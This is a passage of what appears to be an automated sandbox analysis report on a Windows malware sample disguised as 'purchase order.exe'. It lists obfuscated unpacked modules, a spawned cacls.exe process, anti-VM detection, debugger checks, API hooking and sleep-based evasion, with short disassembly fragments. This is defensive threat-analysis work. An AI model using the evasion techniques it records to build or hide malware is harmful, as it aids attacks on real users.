                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037AEC11 push 00000024h; iretd 6_2_037AEC1D
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037B24ED push ebx; retf 6_2_037B2492
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037B94C4 push ds; retf 6_2_037B94DD
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037B248F push ebx; retf 6_2_037B2492
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0351225F pushad ; ret 7_2_035127F9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035127FA pushad ; ret 7_2_035127F9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035409AD push ecx; mov dword ptr [esp], ecx7_2_035409B6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0351283D push eax; iretd 7_2_03512858
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CDE7D3 push ds; retf 7_2_02CDE7EC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CE8844 push FFFFFF8Ah; ret 7_2_02CE8859
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CFAC40 push edi; ret 7_2_02CFAC49
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CD77FC push ebx; retf 7_2_02CD77A1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CD779E push ebx; retf 7_2_02CD77A1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CD18DD push eax; ret 7_2_02CD18F6
                Source: purchase order.exeStatic PE information: section name: .text entropy: 7.809008568803863
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, JFrmvBzaPqnWGSP766.csHigh entropy of concatenated method names: 'za7IccAfr7', 'gucIqAPXjq', 'wXWIuv3pHp', 'tn8I51fi1R', 'TjIIWlQ1QT', 'uyQIeS8oHZ', 'KGIIlgHTJH', 'p71IOqgdTs', 'KK1IFrTc0E', 'K1HI3YLQ4V'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, VdPu5FkgFSHEeXAJGR.csHigh entropy of concatenated method names: 'PxOy5p44xP', 'ieTyWE3r5E', 'LtmyZbQB4h', 'xMhyewqk1B', 'mQnylMTn20', 'mR3ybYvdkp', 'QsqymSdqYo', 'EcXyXENprs', 'KVtyfKhdCD', 'dQQy4h8fQi'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, VNFQkZH9YradeJhYp1.csHigh entropy of concatenated method names: 'y0HBsc4syR', 'oeGBn0pjdn', 'sWPBKKk9ua', 'hDNB0itoZo', 'T0QBT3Lx9P', 'MdbBLlZhui', 'WkfqR8KN91CXnq82Qq', 'aJJ0uaNmt2J4mSWevC', 'xdmfQ7VcvyMxWKk4UM', 'bwvBB6p4pX'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, t0o9bjEHVhWdsTtPtS.csHigh entropy of concatenated method names: 'mAjwK6nj9y', 'dDKw0Wby9x', 'ToString', 'SP3w9iRo7r', 'dRhwJMDrM1', 'qnqwRbDGAp', 'zoewNyKVxT', 'UOXw6FXgGJ', 'jv6wsy9hiP', 'xv0wnLWY25'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, dc4syRqTeG0pjdnuA8.csHigh entropy of concatenated method names: 'tJ5JSCXPku', 'DvEJP9XWR7', 'MvDJiV4ZkR', 'dBAJEo5ni5', 'l68JasIP7G', 'NYkJ13kM3V', 'wUpJAfCB9E', 'vf1JUBTdon', 'XTWJknAg4S', 'VHAJ7RB05Q'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, k59NN6noHfaZETvec4.csHigh entropy of concatenated method names: 'erTrjWb7d1', 'palr9TEQEK', 'oPvrJBiuA5', 'dBWrR8Mx3w', 'fVGrNWAPvL', 'iExr6HNN5s', 'oM1rsyWALv', 'vFsrnsRg2G', 'r4grDkV5Tb', 'WhnrKTYTLg'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, etBC33SA5nxQMtUNpP.csHigh entropy of concatenated method names: 'POFT472elo', 'Yl7TMNlRUo', 'Yo1TSjwykj', 'tVJTPWG4eK', 'nwVTWSyoBe', 'cN1TZXxT2F', 'AtkTenXm3A', 'FDNTlQsPPR', 'oESTbDoJXi', 'ImxTmwQ9Ub'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, q9PXdb5lZhuia34BA8.csHigh entropy of concatenated method names: 'Euv6jk5jdG', 'aUH6JAPfZV', 'p8J6N2jdZU', 'Auo6sGmE1Y', 'E3H6nOSONW', 'aEJNa2i2gD', 'VgNN1U86tt', 'JnjNA9SgY9', 'LQINUrtMka', 'AmCNkUxRPy'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, Mp7oNkAJJo01s4oKFK.csHigh entropy of concatenated method names: 'RfeyTJIPye', 'yFFyw4FbhK', 'XZcyyqCwQW', 'KnayCbtLQj', 'D4gy8xsrVQ', 'XmhyOUqedF', 'Dispose', 'eqVx9oDC4R', 'YIrxJcG2ZC', 'GuqxRW0GFn'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, t320fmBGvhv3MmnPPiO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SWwIgywyLQ', 'VgGIMvA3Qm', 'x2bIpyGsnq', 'GYNISFQUB8', 'y6OIP7ukN6', 'aJeIioa9rQ', 'kkkIEbC7DX'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, FUD7LuJO7nAAj29RTd.csHigh entropy of concatenated method names: 'Dispose', 'B01Bks4oKF', 'rQvVWvlv3F', 'gvidT2Wdwt', 'mhyB7iI0vW', 'cOMBzrgcKD', 'ProcessDialogKey', 'l7AVGdPu5F', 'OFSVBHEeXA', 'gGRVVvoh6g'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, Aoh6gK7Un1SCu84EqF.csHigh entropy of concatenated method names: 'g4AIRjyYJP', 'QOXIN93Mie', 'eXqI6DgpJ9', 'Tj6IslOX10', 'bovIyPyETb', 'pd5InSQIUs', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, Y3W7euRaEBHoPS14vk.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oX3VkjRlPD', 'BCRV72kne0', 'Qu1VzJFwkw', 'CCGrGoINTT', 'IDlrBZnyFT', 'U0prVmNDt3', 'Eearr6Xe5u', 'XNFbJbHlIigkx1ignkK'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, Ca3IwpBBAohM6bkGZgM.csHigh entropy of concatenated method names: 'qpjI7aoJZo', 'XjlIzWE40V', 'wn8CGumhpT', 'ryTCBfDZGA', 'uGPCVJtiHK', 'pIsCruJLry', 'PVUCHkWyqS', 'WhSCjQ2W43', 'AHMC9inmVN', 'E9bCJ50dgE'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, r3RmUHpQ7KDLsEC7eK.csHigh entropy of concatenated method names: 'IrKtqIVIXn', 'pRptu0MDHt', 'V3nt5GonHa', 'apPtWxothE', 'dbtte7SAyn', 'KfatlOxYXg', 'tQutmagLEM', 'Qx6tXebKLZ', 'JFbt4oMfaC', 'eDUtgybEK8'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, v71uZIuWPKk9uaRDNi.csHigh entropy of concatenated method names: 'CKHRvvokvy', 'dZTRcS9n6s', 'e5XRq3Ziqj', 'G9bRuxDYwe', 'KZgRTGq0wZ', 'yrsRLthhMM', 'TXGRwIxEC0', 'KESRxGVeU1', 'LxmRyj9huC', 'zhWRIrF0Ea'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, HXNoUCfs5kxCXaMl2J.csHigh entropy of concatenated method names: 'ajCsFwKxxq', 'mBCs3kKpAO', 'JGpsdSIE7Z', 'TjmsvTQVHV', 'kjusoQ56lh', 'RSCscbNKl7', 'an3sQxJUHs', 'kSYsqCu68x', 'zDQsuPlT55', 'LvCs2pc8S4'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, lNSY1BBHoRe5nWYUQJO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'n3WYyTvjZa', 'axRYIkFUn2', 'qlVYCNMCMQ', 'B7HYYRJEul', 'EC1Y8QFUrk', 'sp1YhCLkUA', 'efsYOMZwVA'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, jM7WyEV4JkIP5VqWam.csHigh entropy of concatenated method names: 'R8LdQt3VJ', 'BN5vm6cvb', 'Procqvs42', 'JvlQOQ5Ma', 'B11u24MOq', 'q4V2KXW5V', 'XlZKKLgdPKa0YNVa9T', 'QjxSK7ZMuBQBc5O4qg', 'Ah1x6fQRd', 'HgaI8tJE1'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, ooZoyZ2Jxnl76E0Q3L.csHigh entropy of concatenated method names: 'fAvNooFR2S', 'DeCNQQjMhK', 'jewRZO7QMs', 't0ORel0MMM', 'QawRlU2wBD', 'uJMRbOK3CS', 'dPhRmVP0CP', 'yfERXkjTVZ', 'Hg5RfHWPs1', 'O9QR4vPgls'
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, Mex1lG109LpcUL75Pt.csHigh entropy of concatenated method names: 'Me5wUdq9Qa', 'RTJw72pdjr', 'KDFxGZA1WZ', 'hGWxBrJxdd', 'iLAwg8jNMs', 'mwswMpoNeU', 'mOCwpJP47r', 'E1kwSlvxh3', 'kdOwPWrT7t', 'JCDwidoy5F'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, JFrmvBzaPqnWGSP766.csHigh entropy of concatenated method names: 'za7IccAfr7', 'gucIqAPXjq', 'wXWIuv3pHp', 'tn8I51fi1R', 'TjIIWlQ1QT', 'uyQIeS8oHZ', 'KGIIlgHTJH', 'p71IOqgdTs', 'KK1IFrTc0E', 'K1HI3YLQ4V'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, VdPu5FkgFSHEeXAJGR.csHigh entropy of concatenated method names: 'PxOy5p44xP', 'ieTyWE3r5E', 'LtmyZbQB4h', 'xMhyewqk1B', 'mQnylMTn20', 'mR3ybYvdkp', 'QsqymSdqYo', 'EcXyXENprs', 'KVtyfKhdCD', 'dQQy4h8fQi'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, VNFQkZH9YradeJhYp1.csHigh entropy of concatenated method names: 'y0HBsc4syR', 'oeGBn0pjdn', 'sWPBKKk9ua', 'hDNB0itoZo', 'T0QBT3Lx9P', 'MdbBLlZhui', 'WkfqR8KN91CXnq82Qq', 'aJJ0uaNmt2J4mSWevC', 'xdmfQ7VcvyMxWKk4UM', 'bwvBB6p4pX'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, t0o9bjEHVhWdsTtPtS.csHigh entropy of concatenated method names: 'mAjwK6nj9y', 'dDKw0Wby9x', 'ToString', 'SP3w9iRo7r', 'dRhwJMDrM1', 'qnqwRbDGAp', 'zoewNyKVxT', 'UOXw6FXgGJ', 'jv6wsy9hiP', 'xv0wnLWY25'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, dc4syRqTeG0pjdnuA8.csHigh entropy of concatenated method names: 'tJ5JSCXPku', 'DvEJP9XWR7', 'MvDJiV4ZkR', 'dBAJEo5ni5', 'l68JasIP7G', 'NYkJ13kM3V', 'wUpJAfCB9E', 'vf1JUBTdon', 'XTWJknAg4S', 'VHAJ7RB05Q'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, k59NN6noHfaZETvec4.csHigh entropy of concatenated method names: 'erTrjWb7d1', 'palr9TEQEK', 'oPvrJBiuA5', 'dBWrR8Mx3w', 'fVGrNWAPvL', 'iExr6HNN5s', 'oM1rsyWALv', 'vFsrnsRg2G', 'r4grDkV5Tb', 'WhnrKTYTLg'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, etBC33SA5nxQMtUNpP.csHigh entropy of concatenated method names: 'POFT472elo', 'Yl7TMNlRUo', 'Yo1TSjwykj', 'tVJTPWG4eK', 'nwVTWSyoBe', 'cN1TZXxT2F', 'AtkTenXm3A', 'FDNTlQsPPR', 'oESTbDoJXi', 'ImxTmwQ9Ub'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, q9PXdb5lZhuia34BA8.csHigh entropy of concatenated method names: 'Euv6jk5jdG', 'aUH6JAPfZV', 'p8J6N2jdZU', 'Auo6sGmE1Y', 'E3H6nOSONW', 'aEJNa2i2gD', 'VgNN1U86tt', 'JnjNA9SgY9', 'LQINUrtMka', 'AmCNkUxRPy'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, Mp7oNkAJJo01s4oKFK.csHigh entropy of concatenated method names: 'RfeyTJIPye', 'yFFyw4FbhK', 'XZcyyqCwQW', 'KnayCbtLQj', 'D4gy8xsrVQ', 'XmhyOUqedF', 'Dispose', 'eqVx9oDC4R', 'YIrxJcG2ZC', 'GuqxRW0GFn'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, t320fmBGvhv3MmnPPiO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SWwIgywyLQ', 'VgGIMvA3Qm', 'x2bIpyGsnq', 'GYNISFQUB8', 'y6OIP7ukN6', 'aJeIioa9rQ', 'kkkIEbC7DX'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, FUD7LuJO7nAAj29RTd.csHigh entropy of concatenated method names: 'Dispose', 'B01Bks4oKF', 'rQvVWvlv3F', 'gvidT2Wdwt', 'mhyB7iI0vW', 'cOMBzrgcKD', 'ProcessDialogKey', 'l7AVGdPu5F', 'OFSVBHEeXA', 'gGRVVvoh6g'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, Aoh6gK7Un1SCu84EqF.csHigh entropy of concatenated method names: 'g4AIRjyYJP', 'QOXIN93Mie', 'eXqI6DgpJ9', 'Tj6IslOX10', 'bovIyPyETb', 'pd5InSQIUs', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, Y3W7euRaEBHoPS14vk.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oX3VkjRlPD', 'BCRV72kne0', 'Qu1VzJFwkw', 'CCGrGoINTT', 'IDlrBZnyFT', 'U0prVmNDt3', 'Eearr6Xe5u', 'XNFbJbHlIigkx1ignkK'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, Ca3IwpBBAohM6bkGZgM.csHigh entropy of concatenated method names: 'qpjI7aoJZo', 'XjlIzWE40V', 'wn8CGumhpT', 'ryTCBfDZGA', 'uGPCVJtiHK', 'pIsCruJLry', 'PVUCHkWyqS', 'WhSCjQ2W43', 'AHMC9inmVN', 'E9bCJ50dgE'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, r3RmUHpQ7KDLsEC7eK.csHigh entropy of concatenated method names: 'IrKtqIVIXn', 'pRptu0MDHt', 'V3nt5GonHa', 'apPtWxothE', 'dbtte7SAyn', 'KfatlOxYXg', 'tQutmagLEM', 'Qx6tXebKLZ', 'JFbt4oMfaC', 'eDUtgybEK8'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, v71uZIuWPKk9uaRDNi.csHigh entropy of concatenated method names: 'CKHRvvokvy', 'dZTRcS9n6s', 'e5XRq3Ziqj', 'G9bRuxDYwe', 'KZgRTGq0wZ', 'yrsRLthhMM', 'TXGRwIxEC0', 'KESRxGVeU1', 'LxmRyj9huC', 'zhWRIrF0Ea'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, HXNoUCfs5kxCXaMl2J.csHigh entropy of concatenated method names: 'ajCsFwKxxq', 'mBCs3kKpAO', 'JGpsdSIE7Z', 'TjmsvTQVHV', 'kjusoQ56lh', 'RSCscbNKl7', 'an3sQxJUHs', 'kSYsqCu68x', 'zDQsuPlT55', 'LvCs2pc8S4'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, lNSY1BBHoRe5nWYUQJO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'n3WYyTvjZa', 'axRYIkFUn2', 'qlVYCNMCMQ', 'B7HYYRJEul', 'EC1Y8QFUrk', 'sp1YhCLkUA', 'efsYOMZwVA'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, jM7WyEV4JkIP5VqWam.csHigh entropy of concatenated method names: 'R8LdQt3VJ', 'BN5vm6cvb', 'Procqvs42', 'JvlQOQ5Ma', 'B11u24MOq', 'q4V2KXW5V', 'XlZKKLgdPKa0YNVa9T', 'QjxSK7ZMuBQBc5O4qg', 'Ah1x6fQRd', 'HgaI8tJE1'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, ooZoyZ2Jxnl76E0Q3L.csHigh entropy of concatenated method names: 'fAvNooFR2S', 'DeCNQQjMhK', 'jewRZO7QMs', 't0ORel0MMM', 'QawRlU2wBD', 'uJMRbOK3CS', 'dPhRmVP0CP', 'yfERXkjTVZ', 'Hg5RfHWPs1', 'O9QR4vPgls'
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, Mex1lG109LpcUL75Pt.csHigh entropy of concatenated method names: 'Me5wUdq9Qa', 'RTJw72pdjr', 'KDFxGZA1WZ', 'hGWxBrJxdd', 'iLAwg8jNMs', 'mwswMpoNeU', 'mOCwpJP47r', 'E1kwSlvxh3', 'kdOwPWrT7t', 'JCDwidoy5F'
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: purchase order.exe PID: 7556, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\purchase order.exeMemory allocated: 22B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeMemory allocated: 2540000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeMemory allocated: 22B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeMemory allocated: 7470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeMemory allocated: 6FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeMemory allocated: 8470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeMemory allocated: 9470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A096E rdtsc 3_2_015A096E
                Source: C:\Users\user\Desktop\purchase order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\cacls.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\purchase order.exe TID: 7576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3448Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3448Thread sleep time: -64000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe TID: 6096Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CEC940 FindFirstFileW,FindNextFileW,FindClose,7_2_02CEC940
                Source: C:\Users\user\Desktop\purchase order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: olMGHvjsNFhNU.exe, 00000008.00000002.3517935623.000000000114F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2664774336.0000025FE3FDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\purchase order.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A096E rdtsc 3_2_015A096E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_00417E43 LdrLoadDll,3_2_00417E43
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566154 mov eax, dword ptr fs:[00000030h]3_2_01566154
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566154 mov eax, dword ptr fs:[00000030h]3_2_01566154
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155C156 mov eax, dword ptr fs:[00000030h]3_2_0155C156
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F8158 mov eax, dword ptr fs:[00000030h]3_2_015F8158
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F4144 mov eax, dword ptr fs:[00000030h]3_2_015F4144
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F4144 mov eax, dword ptr fs:[00000030h]3_2_015F4144
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F4144 mov ecx, dword ptr fs:[00000030h]3_2_015F4144
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F4144 mov eax, dword ptr fs:[00000030h]3_2_015F4144
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F4144 mov eax, dword ptr fs:[00000030h]3_2_015F4144
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov eax, dword ptr fs:[00000030h]3_2_0160E10E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov ecx, dword ptr fs:[00000030h]3_2_0160E10E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov eax, dword ptr fs:[00000030h]3_2_0160E10E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov eax, dword ptr fs:[00000030h]3_2_0160E10E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov ecx, dword ptr fs:[00000030h]3_2_0160E10E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov eax, dword ptr fs:[00000030h]3_2_0160E10E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov eax, dword ptr fs:[00000030h]3_2_0160E10E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov ecx, dword ptr fs:[00000030h]3_2_0160E10E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov eax, dword ptr fs:[00000030h]3_2_0160E10E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E10E mov ecx, dword ptr fs:[00000030h]3_2_0160E10E
